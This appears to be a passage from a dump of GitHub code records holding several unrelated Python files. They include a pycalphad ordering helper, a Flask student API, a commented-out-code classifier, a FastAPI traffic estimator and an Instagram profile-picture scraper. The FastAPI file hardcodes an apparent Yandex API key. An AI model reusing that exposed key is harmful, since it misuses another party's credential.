subl_slices.append(slice(start_idx, end_idx))\n\n # For each set of symmetrically equivalent sublattices\n for symm_subl in self.symmetric_subl_idx:\n # Check whether the site fractions of each pair of symmetrically\n # equivalent sublattices are ordered or disordered\n for idx1, idx2 in itertools.combinations(symm_subl, 2):\n # A phase is ordered if any pair of sublattices does not have\n # equal (within numerical tolerance) site fractions\n pair_is_ordered = np.any(~np.isclose(site_fractions[subl_slices[idx1]], site_fractions[subl_slices[idx2]]))\n if pair_is_ordered:\n return False\n return True\n\n\ndef create_ordering_records(dbf, comps, phases):\n \"\"\"Return a dictionary with the sublattice degrees of freedom and equivalent\n sublattices for order/disorder phases\n\n Parameters\n ----------\n dbf : pycalphad.Database\n comps : list[str]\n List of active components to consider\n phases : list[str]\n List of active phases to consider\n\n Returns\n -------\n List[OrderingRecord]\n\n Notes\n -----\n Phases which should be checked for ordered/disordered configurations are\n determined heuristically for this script.\n\n The heuristic for a phase satisfies the following:\n 1. The phase is the ordered part of an order-disorder model\n 2. The equivalent sublattices have all the same number of elements\n \"\"\"\n species = unpack_components(dbf, comps)\n ordering_records = []\n for phase_name in phases:\n phase_obj = dbf.phases[phase_name]\n if phase_name == phase_obj.model_hints.get('ordered_phase', ''):\n # This phase is active and modeled with an order/disorder model.\n dof = [len(subl.intersection(species)) for subl in phase_obj.constituents]\n # Define the symmetrically equivalent sublattices as any sublattices\n # TODO: the heuristic here is simple and incorrect for cases like L1_2.\n # that have the same site ratio. Create a {site_ratio: [subl idx]} dict\n site_ratio_idxs = defaultdict(lambda: [])\n for subl_idx, site_ratio in enumerate(phase_obj.sublattices):\n site_ratio_idxs[site_ratio].append(subl_idx)\n equiv_sublattices = list(site_ratio_idxs.values())\n ordering_records.append(OrderingRecord(phase_name, phase_obj.model_hints['disordered_phase'], dof, equiv_sublattices))\n return ordering_records\n\n\ndef rename_disordered_phases(eq_result, ordering_records):\n \"\"\"\n Modify an xarray Dataset to rename the ordered phase names to the disordered phase\n names if the equilibrium configuration is disordered\n\n Parameters\n ----------\n eq_result : xarray.Dataset\n order_disorder_dict : OrderingRecord\n Output from scheil.utils.order_disorder_dict\n\n Returns\n -------\n xrray.Dataset\n Dataset modified in-place\n\n Notes\n -----\n This function does _not_ change the site fractions array of the disordered\n configurations to match the site fractions matching the internal degrees of freedom\n of the disordered phase's constituents (although that should be possible).\n\n Examples\n --------\n >>> from pycalphad import Database, equilibrium, variables as v\n >>> import pycalphad.tests.databases\n >>> from importlib_resources import files\n >>> dbf = Database(str(files(pycalphad.tests.databases).joinpath(\"alcfe_b2.tdb\")))\n >>> comps = ['AL', 'FE', 'VA']\n >>> phases = list(dbf.phases.keys())\n >>> eq_res = equilibrium(dbf, comps, ['B2_BCC'], {v.P: 101325, v.T: 1000, v.N: 1, v.X('AL'): [0.1, 0.4]})\n >>> ordering_records = create_ordering_records(dbf, comps, phases)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['B2_BCC', '', ''], ['B2_BCC', '', '']]\n >>> out_result = rename_disordered_phases(eq_res, ordering_records)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['A2_BCC', '', ''], ['B2_BCC', '', '']]\n \"\"\"\n\n for ord_rec in ordering_records:\n # Array indices matching phase with ordered phase name\n mask = eq_result.Phase == ord_rec.ordered_phase_name\n # disordered_mask is a boolean mask that is True if the element listed as an\n # ordered phase is a disordered configuration. We want to broadcast over all\n # dimensions except for internal_dof (we need all internal dof to determine if\n # the site fractions are disordered). The `OrderingRecord.is_disordered` method\n # is not vectorized (operates on 1D site fractions), so we use `vectorize=True`.\n disordered_mask = xr.apply_ufunc(ord_rec.is_disordered, eq_result.where(mask).Y, input_core_dims=[['internal_dof']], vectorize=True)\n # Finally, use `xr.where` to set the value of the phase name to the disordered\n # phase everywhere the mask is true and use the existing value otherwise\n eq_result['Phase'] = xr.where(disordered_mask, ord_rec.disordered_phase_name, eq_result.Phase)\n return eq_result","repo_name":"pycalphad/scheil","sub_path":"scheil/ordering.py","file_name":"ordering.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"11045727745","text":"from http import HTTPStatus\nfrom flask import (\n Blueprint,\n request\n)\nfrom marshmallow import ValidationError\nimport pydash as py_\nfrom pymongo.errors import DuplicateKeyError\nfrom flask_jwt_extended import jwt_required, current_user\nimport src.constants as Consts\nimport src.schemas.student as SchemaStudent\nimport src.controllers as Controller\n\n\nbp = Blueprint('student', __name__, url_prefix='/api/student')\n\n\n@bp.route('', methods=['POST'])\n@jwt_required()\ndef add_student():\n user_id=py_.get(current_user, '_id')\n payload = request.get_json()\n args = request.args\n class_id = py_.get(args, 'class', None)\n try:\n student_id = Controller.Student.insert_student(user_id,class_id, payload)\n except ValidationError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": {\"id\":student_id},\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('', methods=['GET'])\n@jwt_required()\ndef get_student():\n user_id=py_.get(current_user, '_id')\n args = request.args\n page = py_.to_integer(py_.get(args, 'page', 1))\n page_size = py_.to_integer(py_.get(args, 'page_size', Consts.PAGE_SIZE_MAX))\n try:\n return_data = Controller.Student.list_students(user_id,page,page_size)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_oid(id):\n try:\n return_data = Controller.Student.one_student(id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('id/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_id(id):\n user_id = py_.get(current_user, '_id')\n try:\n return_data = Controller.Student.one_student_id(id,user_id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }","repo_name":"bezleen/attendance-app-backend","sub_path":"src/api/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31562551421","text":"# -*- coding:UTF-8 -*-\n\"\"\"\n@Description Find commented-out code in python scripts.\n@Author Zhang YT\n@Date 2020/10/23 14:38\n\"\"\"\nimport os\nfrom tokenize import tokenize, TokenError\nfrom ast import parse\nfrom json import dump\nfrom argparse import ArgumentParser\nfrom numpy import asarray, squeeze\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import sequence\nfrom time import process_time\nfrom functools import wraps\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 忽略警告信息,不加这一句警告贼多\n\n\ndef timethis(func):\n \"\"\"计时函数装饰器\"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = process_time()\n r = func(*args, **kwargs)\n end = process_time()\n print('{} executing time: {}s'.format(func.__name__, end - start))\n return r\n return wrapper\n\n\ndef create_generator(data):\n \"\"\"字符流生成器,在内部构建了一个闭包。\n 为了节约内存,避免一次性加载文件内容\"\"\"\n\n def generator():\n for elem in data:\n try:\n yield str.encode(elem)\n except:\n yield str.encode('')\n\n g = generator() # 生成器\n\n def next_element():\n return next(g)\n\n return next_element # 迭代器\n\n\nclass Classifier(object):\n def __init__(self,\n root_path, # 指定扫描目录,或者文件\n model_character_path, # (可选)训练好的character模型\n model_token_path, # (可选)训练好的 token模型\n vocab_path, # (可选)token模型使用的词表文件\n outfile, # (可选)输出结果的目录\n keyword=\"vocabs/vocab_keywords.txt\"\n ):\n self.root_path = root_path\n self.model_character_path = model_character_path\n self.model_token_path = model_token_path\n self.vocab_path = vocab_path\n self.outfile = outfile\n self.load_model() # 载入模型文件\n self.init_character_dict() # 初始化character模型所必需的词表\n self.init_token_dict(self.vocab_path) # 初始化token模型所必需的词表\n self.init_adjacent_dict(keyword) # 初始化python保留字表\n\n def load_model(self):\n self.lstm_model_character = load_model(self.model_character_path)\n self.lstm_model_token = load_model(self.model_token_path)\n\n def init_character_dict(self):\n \"\"\"初始化character模型所必需的词表\"\"\"\n # 所有可见字符将其映射为唯一的整数\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()` ,./<>?;':\\\"[]{}=-+_\\t\\r\\n|\\\\\"\n self.char_to_int = dict((c, i + 2) for i, c in enumerate(alphabet))\n self.char_to_int[''] = 0\n self.char_to_int[''] = 1\n self.int_to_char = dict((i, c) for c, i in self.char_to_int.items())\n\n def init_token_dict(self, vocab_path):\n \"\"\"初始化token模型所必需的词表\"\"\"\n # 从词表目录读取词表文件\n vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n vocab.append(line.rstrip('\\n'))\n self.token_2_id = {row: index + 8 for index, row in enumerate(vocab)}\n self.token_2_id[''] = 0\n self.token_2_id[''] = 1\n self.token_2_id[''] = 2\n self.token_2_id[''] = 3\n self.token_2_id[''] = 4\n self.token_2_id[''] = 5\n self.token_2_id[''] = 6\n self.token_2_id[''] = 7\n self.id_2_token = {v: k for k, v in self.token_2_id.items()}\n\n def init_adjacent_dict(self, vocab_path):\n \"\"\"初始化python保留字表\"\"\"\n # 从词表目录读取词表文件\n self.id_vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n self.id_vocab.append(line.rstrip('\\n'))\n\n @staticmethod\n def get_pyfile_path(root_path):\n \"\"\"获取指定目录及其子目录下所有的py文件的目录\"\"\"\n pyfiles = []\n root_path = os.path.abspath(root_path)\n for file_path, _, files in os.walk(root_path):\n for file in files:\n if file.endswith('.py'):\n pyfiles.append(os.path.join(file_path, file))\n return pyfiles\n\n @staticmethod\n def read_txtfile(filename):\n \"\"\"读取指定path对应的py文件的文本\"\"\"\n sharps = []\n try:\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n sharps.append(line.strip('\\n'))\n except UnicodeDecodeError:\n pass\n return sharps\n\n def gather_sharp_data(self, pyfiles):\n \"\"\"读取指定path对应的py文件的文本,并提取其#开头的所有行\"\"\"\n sharp_data = []\n for pyfile in pyfiles:\n pycontent = self.read_txtfile(pyfile)\n for lineno, line in enumerate(pycontent):\n if line.lstrip().startswith('#'):\n dic = {\n 'file': pyfile,\n 'line': lineno + 1,\n 'highlighted_element': line.lstrip(' #').rstrip()\n }\n sharp_data.append(dic)\n return sharp_data\n\n def from_text_to_character_input(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n for row in text:\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_character_input_and_index(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n indexes.append(index)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n def from_text_to_token_id(self, row):\n \"\"\"把一行代码转成token\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n tokens = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n if toknum == 1:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 2:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 3:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 53:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 56:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 57:\n tokens.append(self.token_2_id.get(''))\n except TokenError:\n pass # 遍历到末尾会raise error\n return tokens\n\n def check_adjacent_id(self, row):\n \"\"\"检查有没有相邻的两个id\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n res = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n res.append((toknum, tokval))\n except TokenError:\n pass\n # 检查有没有相邻的两个id,有的话则不是code\n for i in range(len(res) - 1):\n if res[i][0] == 1 \\\n and res[i + 1][0] == 1 \\\n and res[i][1] not in self.id_vocab \\\n and res[i + 1][1] not in self.id_vocab:\n return True\n return False\n\n def from_text_to_token_input(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n for row in text:\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_token_input_and_index(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n indexes.append(index)\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n @staticmethod\n def reduce_sharp_by_rule(tuple_list):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出符合规则的[{file,line,highlighted_element}]\"\"\"\n reduced_set = [] # 还需进一步判断的行\n code_set = [] # 不需进一步判断的行\n for item in tuple_list:\n try:\n text_line = item['highlighted_element']\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n code_set.append(item)\n continue\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_set.append(item)\n continue\n reduced_set.append(item)\n except:\n reduced_set.append(item) # 不通过说明from语句没通过编译\n return reduced_set, code_set\n\n @timethis\n def classify(self):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出被怀疑为代码的[{file,line,highlighted_element}]\"\"\"\n # 获得数据\n if self.root_path.endswith('.py'):\n path = os.path.abspath(self.root_path)\n tuple_list = self.gather_sharp_data([path])\n else:\n tuple_list = self.gather_sharp_data(self.get_pyfile_path(self.root_path))\n print(f\"All testing comment number from {self.root_path}: {len(tuple_list)}.\")\n\n # 依照确定性算法,将注释分为需要进一步判断的tuple_list和code_list\n tuple_list, code_list = self.reduce_sharp_by_rule(tuple_list)\n # 防止模型输入为空\n if len(tuple_list) <= 0:\n print(\"1: No commented-out code.\")\n # 保存结果\n self.dump_res(code_list)\n return # 没发现值得进一步分析的行,提前结束\n else:\n print(\"Commented code number find by pure grammar checker: \", len(code_list))\n\n # 然后切分成token再输入token模型\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_token_input_and_index(sharps)\n predict_label = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_token = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_token.append(tuple_list[lineno])\n print(\"Commented code number find by `token` model: \", len(code_item_token))\n\n # 最后使用character模型逐字符判断\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_character_input_and_index(sharps)\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_char = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_char.append(tuple_list[lineno])\n print(\"Commented code number find by `character` model: \", len(code_item_char))\n\n code_list.extend(code_item_char)\n # 两个集合取并集\n for item in code_item_token:\n for item2 in code_item_char:\n if item.get('highlighted_element') == item2.get('highlighted_element') \\\n and item.get('line') == item2.get('line') \\\n and item.get('file') == item2.get('file'):\n break\n else:\n code_list.append(item)\n print(\"Total number of commented code: .\", len(code_list))\n # 保存结果\n self.dump_res(code_list)\n\n def contains_code(self, lines):\n waiting_line_index = []\n code_line_index = set()\n for index, text_line in enumerate(lines):\n try:\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n # compile(text_line, '', 'exec')\n code_line_index.add(index)\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_line_index.add(index)\n waiting_line_index.append(index)\n except:\n waiting_line_index.append(index) # 不通过说明from语句没通过编译\n # 然后切分成token再输入token模型\n sharp_inputs = self.from_text_to_token_input([lines[x] for x in waiting_line_index])\n predict_labels = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_labels) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n # 最后使用character模型逐字符判断\n sharp_inputs = self.from_text_to_character_input([lines[x] for x in waiting_line_index])\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_label) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n result = [False] * len(lines)\n for index in code_line_index:\n result[index] = True\n return result\n\n def dump_res(self, tuple_list):\n \"\"\"添加一些其他信息,然后整合成code_warning.json\"\"\"\n for dic in tuple_list:\n dic['offset'] = 0\n dic['length'] = 0\n dic['module'] = ''\n dic['problem_class'] = {\n 'name': '8_2',\n 'severity': '',\n 'inspection_name': '8_2',\n 'attribute_key': ''\n }\n dic['entry_point'] = {\n 'TYPE': '',\n 'FQNAME': ''\n }\n dic['description'] = 'Do not use comment lines to make the code invalid.'\n with open(os.path.join(self.outfile, 'code_warning.json'), 'w') as f:\n dump({'problems': tuple_list}, f)\n\n\ndef main():\n parser = ArgumentParser(description='Check if pyfile contains commented-out code.')\n\n parser.add_argument(dest='root_path', metavar='root_path',\n help='Check project root path')\n\n parser.add_argument('-mc', '--model_character_path',\n metavar='model_character_path',\n default='models/mc.hdf5',\n dest='model_character_path',\n help='character based model path')\n\n parser.add_argument('-mt', '--model_token_path',\n metavar='model_token_path',\n default='models/mt_20000.hdf5',\n dest='model_token_path',\n help='token based model path')\n\n parser.add_argument('-v', '--vocab',\n metavar='vocab_path',\n default='vocabs/vocab_20000.txt',\n dest='vocab_path',\n help='token vocabulary path')\n\n parser.add_argument('-o', dest='outfile',\n default='results',\n help='output file path')\n\n args = parser.parse_args()\n\n args = {'root_path': args.root_path,\n 'model_character_path': args.model_character_path,\n 'model_token_path': args.model_token_path,\n 'vocab_path': args.vocab_path,\n 'outfile': args.outfile,\n }\n\n classifier = Classifier(**args)\n classifier.classify()\n\nif __name__ == '__main__':\n main()\n","repo_name":"superlova/codeclf","sub_path":"codeclf.py","file_name":"codeclf.py","file_ext":"py","file_size_in_byte":20262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71103918889","text":"from fastapi import APIRouter, Request\r\nfrom fastapi.responses import JSONResponse\r\nfrom algorithm import *\r\nfrom math import radians, cos, sin, asin, sqrt\r\n\r\n\r\ndef get_distance(lat1, lat2, lon1, lon2):\r\n lon1 = radians(lon1)\r\n lon2 = radians(lon2)\r\n lat1 = radians(lat1)\r\n lat2 = radians(lat2)\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\r\n c = 2 * asin(sqrt(a))\r\n r = 6371\r\n return(c * r) * 1000\r\n\r\nrouter = APIRouter(\r\n prefix='/api'\r\n)\r\napikey = '67b62d8b-ea26-4350-a5f6-6e7a3c6ed99e'\r\nurl = 'https://geocode-maps.yandex.ru/1.x'\r\nparams = {\r\n 'apikey': apikey,\r\n 'geocode': None,\r\n 'sco': 'latlong',\r\n 'kind': 'metro',\r\n 'format': 'json'\r\n}\r\nbellar_district = District(0.7*202000, 0.7*212000)\r\n# 0.85 - 500 - 1000\r\nroads = {'Center': ([55.775503, 37.571737], [55.773229, 37.554314], [55.772581, 37.572870], [55.775097, 37.582827]),\r\n 'Out': ([55.774584, 37.560923], [55.770859, 37.567703], [55.773887, 37.579179])}\r\ntypes = {'ЖК': Houses, 'Жилое': House, 'Отель': Hotel, 'Офис': Office}\r\nmetro_cords = {'Белорусская': (55.777349, 37.581997), 'Беговая': (55.773106, 37.549837)}\r\n\r\n\r\n@router.get('/traffic')\r\nasync def get_info(cords: str, type: str, area: float, floors: int, schools: int, n: int, metro: str, time: str):\r\n cords = tuple(float(i) for i in cords.split(','))\r\n dst = get_distance(metro_cords[metro][0], cords[0], metro_cords[metro][1], cords[1])\r\n building = types[type](area, floors, dst, schools, n)\r\n roads = []\r\n metro_params = {'Default': {'Белорусская': 18000, 'Беговая': 13500}, 'Rush': {'Белорусская': 9.6, 'Беговая': 3.4}}\r\n metro = Metro(metro_params['Default'][metro], building.getter(), bellar_district.getter(), metro_params['Rush'][metro], 1, time) \r\n return metro.getter()\r\n\r\n","repo_name":"code-n-cry/DriveHack_MosTransProject","sub_path":"backend/api_router.py","file_name":"api_router.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"27600773174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/8/19 19:52\n# @File : p15_iterate_in_sorted_order_over_merged_sorted_iterables.py\n# @Software: PyCharm\n\n\"\"\"顺序迭代合并后的排序迭代对象\"\"\"\n\nimport heapq\n\na = [1, 4, 7, 10]\nb = [2, 5, 6, 11]\n\nfor i in heapq.merge(a, b):\n print(i, end=',')\n\n# heapq.merge 可迭代特性意味着它不会立马读取所有序列。这就意味着可以在非常长的序列中使用,而不会有太大的开销\n\n# heapq.merge() 需要所有输入序列必须是排过序的。\n# 它并不会预先读取所有数据到堆栈中或者预先排序,也不会对输入做任何的排序检测。\n# 它仅仅是检查所有序列的开始部分并返回最小的那个,这个过程一直会持续直到所有输入序列中的元素都被遍历完。\n","repo_name":"mofei952/cookbook","sub_path":"c04_iterators_and_generators/p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_name":"p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37570036917","text":"import requests \r\nfrom bs4 import BeautifulSoup as bs \r\nimport json \r\nimport random \r\nimport os.path \r\nimport urllib.request\r\ninsta_url ='https://www.instagram.com'\r\ninta_username = input()\r\n\r\nresponse = requests.get(f\"{insta_url}/{inta_username}/\") \r\n\r\nif response.ok: \r\n\thtml = response.text \r\n\tbs_html = bs(html, features =\"lxml\") \r\n\tbs_html = bs_html.text \r\n\tindex = bs_html.find('profile_pic_url_hd')+21\r\n\tremaining_text = bs_html[index:] \r\n\tremaining_text_index = remaining_text.find('requested_by_viewer')-3\r\n\tstring_url = remaining_text[:remaining_text_index] \r\n\tX=string_url.split('\\\\u0026')\r\n\tstring_url=\"&\".join(X)\r\n\r\n\r\n\r\nurllib.request.urlretrieve(string_url, \"pic1.jpg\")\r\nprint(\"\\n\t\t\t downloading completed ..............\") \r\n","repo_name":"Scoder08/scoder","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22860508975","text":"def fib(n: int) -> int:\n \"\"\"\n Calculates the n-th Fibonacci number in O(log(n)) time.\n See: [Exercise 1.19](https://bit.ly/3Bhv2JR)\n \"\"\"\n if n < 0:\n fib_neg = fib(-n)\n return fib_neg if (1 - n) % 2 == 0 else -fib_neg\n\n a, b, p, q = 1, 0, 0, 1\n\n while n:\n if n % 2 == 0:\n p, q = (p**2 + q**2), (q**2 + 2 * p * q)\n n //= 2\n else:\n a, b = (b * q + a * p + a * q), (b * p + a * q)\n n -= 1\n\n return b\n","repo_name":"matyama/codewars","sub_path":"python/codewars/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34871259488","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef title(y_pred, y_test, target_names, idx):\n if y_pred.max() == 1 and y_test.max() == 1 and target_names.max() == 1:\n pred_name = \"Less or equal than 4\" if int(y_pred[idx]) == 0 else \"Greater or equal than 5\"\n exp_name = \"Less or equal than 4\" if y_test[idx] == 0 else \"Greater or equal than 5\"\n else:\n pred_name = target_names[int(y_pred[idx])]\n exp_name = target_names[y_test[idx]]\n \n return f\"predicted: {pred_name}\\nexpected: {exp_name}\"\n\n\ndef plot_gallery(images, titles, h, w, rows = 3, cols = 4):\n plt.figure(figsize=(1.8 * cols, 2.4 * rows))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35)\n\n for i in range(rows * cols):\n plt.subplot(rows, cols, i + 1)\n plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n plt.show()\n\n\ndef convert_target(target):\n new_target = list()\n\n for mark in target:\n if mark < 5:\n new_target.append(0)\n else:\n new_target.append(1)\n\n return np.array(new_target)","repo_name":"ThinkingFrog/OptimizationMethods","sub_path":"Coursework/recognition/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74820724649","text":"\nfrom cs50 import get_string\n\n# Prompt user for text\ntext = get_string(\"Text: \")\n\n# words variable should have +1 because the last word is followed by a punctuation, and not by ' '\nwords = 1\nsentences = 0\nletters = 0\n\n# Loop through each character\nfor i in range(len(text)):\n \n # If the char is a letter, update the variable\n if text[i].isalpha():\n letters += 1\n \n # If it's a space, then it means it's the end of a word\n elif text[i] == ' ':\n words += 1\n \n # If it's a punct, update the sentences variable\n elif text[i] == '.' or text[i] == '?' or text[i] == '!':\n sentences += 1\n\n# l letters in w words ==> l -- w\n# L letters in 100 words: L -- 100\n\n# Equation becomes: 100.l = w.L\n# L = 100.l/w\n# Same goes for sentences\n\n# L is letters per 100 words\nL = (letters * 100) / words\n\n# S is sentences per 100 words\nS = (sentences * 100) / words\n\n# Coleman-Liau index\nindex = round(0.0588 * L - 0.296 * S - 15.8)\n\n# Print grade according to the index\nif index >= 16:\n print(\"Grade 16+\")\n \nelif index < 1:\n print(\"Before Grade 1\")\n \nelse:\n print(f\"Grade: {index}\")\n","repo_name":"gustavokenzo1/cs50","sub_path":"Week 6 - Readability.py","file_name":"Week 6 - Readability.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23725817464","text":"continua = 